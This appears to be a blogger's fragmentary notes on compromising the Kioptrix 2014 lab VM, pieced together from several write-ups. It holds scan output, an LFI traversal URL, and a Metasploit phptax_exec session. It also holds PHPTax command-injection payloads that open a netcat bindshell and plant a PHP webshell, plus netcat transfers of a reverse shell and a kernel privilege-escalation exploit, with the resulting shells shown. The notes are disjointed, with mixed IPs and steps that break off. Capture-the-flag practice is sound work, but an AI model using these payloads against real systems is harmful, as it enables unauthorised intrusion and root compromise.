Walkthru
Notes
2nd approach using nc via web using php reverse shell
3rd approach w/o metasploit
===================
walkthru:
1. Updating OpenFuck Exploit(764) but it didnt work here@ https://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
2.
==============
Notes:
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox virtual NIC)
Running: FreeBSD 9.X|10.X
OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10
OS details: FreeBSD 9.0-RELEASE - 10.3-RELEASE
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
|_http-title: 403 Forbidden
MAC Address: 08:00:27:82:89:F9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.18 - 2.6.22
======
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.2.34
+ Target Hostname: 172.16.2.34
+ Target Port: 80
+ Start Time: 2018-04-23 15:48:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 12:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2018-04-23 15:49:58 (GMT-5) (73 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
=====
---- Scanning URL: http://172.16.2.34/ ----
+ http://172.16.2.34/cgi-bin/ (CODE:403|SIZE:210)
--- Scanning URL: http://172.16.2.34:8080/ ----
+ http://172.16.2.34:8080/cgi-bin/ (CODE:403|SIZE:210)
====================
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.2.34
+ Target Hostname: 172.16.2.34
+ Target Port: 8080
+ Start Time: 2018-04-23 16:08:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 26189 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2018-04-23 16:12:34 (GMT-5) (237 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
STEPs
1. Tried https://www.exploit-db.com/exploits/29290/ &
2. https://www.exploit-db.com/exploits/764/
didnt work.
3. source code pages shows
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php"> 
Hitting
/pChart2.1.3/index.php shows some charting tool. After searching for the tool’s name on searchsploit, it showed that it’s vulnerable to LFI.
Example:
5. Since we have an LFI and we know that the server is running Apache, let’s search for the apacheconfig file. After checking this, I managed to find the httpd.config file. "In FreeBSD, the main Apache HTTP Server configuration file is installed as
/usr/local/etc/apache2x/httpd.conf, where x represents the version number"... soruce: https://www.freebsd.org/doc/handbook/network-apache.htmlhttp://192.168.1.68/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf 6. Particularly interesting snippet:
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
</VirtualHost> (a. Tried to change the useragent in Mozilla but it didnt work https://jhalon.github.io/vulnhub-kioptrix5/)
(b. Installed Quick preference button plugin which worked. use menu spoof -> custom and add "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)". Was having problem next time so I removed everything except Mozilla/4.0 and it worked.
soruce: https://kongwenbin.wordpress.com/2016/11/02/writeup-for-kioptrix-2014-5/ )
root@kali:~/Desktop# curl -H "User-Agent:Mozilla/4.0" http://192.168.1.68:8080
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /</title>
</head>
<body>
<h1>Index of /</h1>
<ul><li><a href="phptax/"> phptax/</a></li>
</ul>
</body></html>
root@kali:~/Desktop# curl -H "User-Agent:Mozilla/4.0" http://192.168.1.68:8080/phptax/
_lots of markup_ 8. Oh… well that’s not good! It seems that this is some kind of Tax Return Program called PHPTAX.
A quick Google search revealed that this software was vulnerable to a Remote Code Execution Attack.
Alright, let’s fire up Metasploit and see if we can’t exploit this.
msf > use exploit/multi/http/phptax_execmsf exploit(phptax_exec) > set RHOST 192.168.1.159RHOST => 192.168.1.159 msf exploit(phptax_exec) > set RPORT 8080 RPORT => 8080 msf exploit(phptax_exec) > run
/bin/sh -i
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(www) groups=80(www)
Now that we have a working TTY Shell, let’s do some reconnaissance and see if we can’t find a privilege escalation exploit.
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd6
Another quick Google search reveled that FreeBDS 9.0 was vulnerable to a Intel SYSRET Kernel Privilege Escalation.[28718]
From here let’s go ahead and copy over that exploit, open up a text editor and save it as a .c file on your Kali box. Once that’s done, open up a netcat connection and pipe the exploit file through it.
root@kali:~# gedit sys.c
root@kali:~# nc -lvp 1234 < sys.c
listening on [any] 1234 ...
Now that we have that waiting for us, let’s navigate to the /tmp folder on the Kioptrix Machine, and connect to our netcat connection - which will automatically download the exploit file for us.
$ cd /tmp
$ nc -nv 192.168.1.3 1234 > sys.c
Connection to 192.168.1.3 1234 port [tcp/*] succeeded!
Yes! Let’s compile the exploit and run it!
$ gcc sys.c
$ ./a.out
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ whoami
root
getting core dumped and privilege escalation not working . Tried reboot still no difference
--------
2nd approach w/o metasploit
source: https://medium.com/bugbountywriteup/kioptrix-2014-c5b1f5144fc9 &
https://blog.techorganic.com/2014/04/08/kioptrix-hacking-challenge-part-5/
using LFI vulnerability, I created a file shell.php on the server to run commands (such as id, uname-a)
1. A quick Google search revealed that PHPTAX was vulnerable to remote code execution. To test if this instance was vulnerable, I wrote the output of id into out.txt, and on another browser, I loaded out.txt and was able to view its contents:
http://192.168.1.159:8080/phptax/index.php?pfilez=1040pg1.tob;id > out.txt&pdf=make
2. I used a reverse shell included in Kali under
/usr/share/webshells/ but also found here.3. On my box:
$ nc -lvp 1234 < php-reverse-shell.php-l to listen for a connection
-v for verbose
-p to specify port
< to print the contents of the file upon connection
4. In the webshell:
/shell.php?cmd=nc 192.168.15.141 1234 > php-reverse-shell.php> to direct the incoming data into a new file on the server
5. The reverse shell can be invoked by calling it’s path in the browser.
http://192.168.15.150:8080/phptax/php-reverse-shell.php--------
3rd approach w/o metasploit
walkthru1 .https://infosecuritygeek.com/vulnhub-kioptrix-2014/
1. You are able to access the phptax page from the site
2. Found another web application named PHPTax. Again, let’s search for an existing exploit on PHPTax before performing further enumeration.
root@loki:~# searchsploit phptax
--------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
--------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code I | php/webapps/21833.rb
PhpTax 0.8 - File Manipulation (newvalue) / | php/webapps/25849.txt
phptax 0.8 - Remote Code Execution | php/webapps/21665.txt
-------------------------------------------------------------------------------
root@loki:~# cat /usr/share/exploitdb/platforms/php/webapps/21665.txt
-----------------------------------------------------
phptax 0.8 <= Remote Code Execution Vulnerability
-----------------------------------------------------
Discovered by: Jean Pascal Pereira <pereira@secbiz.de>
Vendor information:
"PhpTax is free software to do your U.S. income taxes. Tested under Unix environment.
The program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot."
Vendor URI: http://sourceforge.net/projects/phptax/
----------------------------------------------------
Risk-level: High
The application is prone to a remote code execution vulnerability.
----------------------------------------------------
drawimage.php, line 63:
include ("./files/$_GET[pfilez]");
// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
----------------------------------------------------
Exploit / Proof of Concept:
Bindshell on port 23235 using netcat:
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
<----------------------------TRUNCATED----------------------------->
3. Based on the exploit we found, we need to inject a payload to the address bar to create a simple php web shell on the target. This will make succeeding file transfers easier.You may receive an error if it is successful with creating the exploit/file [error @ http://www.doyler.net/wp-content/uploads/kioptrix5/kioptrix5-12-rce.png ]
http://192.168.5.17:8080/phptax/drawimage.php?pfilez=xxx;echo %22%3C%3Fphp system(\$_GET['cmd']); %3F%3E%22 > shell.php;&pdf=make
3a. This module exploits a vulnerability found in PhpTax, an income tax report generator. When generating a PDF, the icondrawpng() function in drawimage.php does not properly handle the pfilez parameter, which will be used in a exec() statement, and then results in arbitrary remote code execution under the context of the web server. Please note: authentication is not required to exploit this vulnerability.
3b. Single Line PHP Script to Gain Shell
3b. Single Line PHP Script to Gain Shell
Since WebApp security is what I’m most interested in at the moment, I have been learning PHP, I’m not finished learning yet, but today (while reading about how inputs should be sanitised before using “include”) I remembered the single line PHP shell, and I had a go and this is what I came up with: [source : http://www.grobinson.me/single-line-php-script-to-gain-shell/]
4. Let’s check if the injection is successful.
Success!
13. Next, we can download a reverse php shell from pentest monkey and transfer it to the target via netcat for an interactive web shell.
Kali:
root@loki:~/Desktop# nc -nlvp 1337 < reverse.php
listening on [any] 1337 ...
Browser:
http://192.168.5.17:8080/phptax/shell.php?cmd=nc%20192.168.5.14%201337%20%3E%20reverse.php
14. Let’s browse to reverse.php we uploaded to trigger the reverse connection.[this didnt work. was unable to get revese shell. Tried to run http://192.168.5.17:8080/phptax/shell.php?cmd=reverse.php and http://192.168.5.17:8080/phptax/reverse.php but no luck]
root@loki:~/Desktop# nc -nlvp 1337
listening on [any] 1337 ...
connect to [192.168.5.14] from (UNKNOWN) [192.168.5.17] 22157
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
1:46PM up 2:02, 0 users, load averages: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$ id
uid=80(www) gid=80(====================source: https://chousensha.github.io/blog/2014/06/27/kioptrix-2014/
We managed to break through. Now let’s see how we can become root. I used this mmap/ptrace exploit. I downloaded it to my machine and served it on netcat, than I connected from the victim to the attacker machine and saved the file to the /tmp directory. From there, it was a matter of compiling it and running it:
Comments
Post a Comment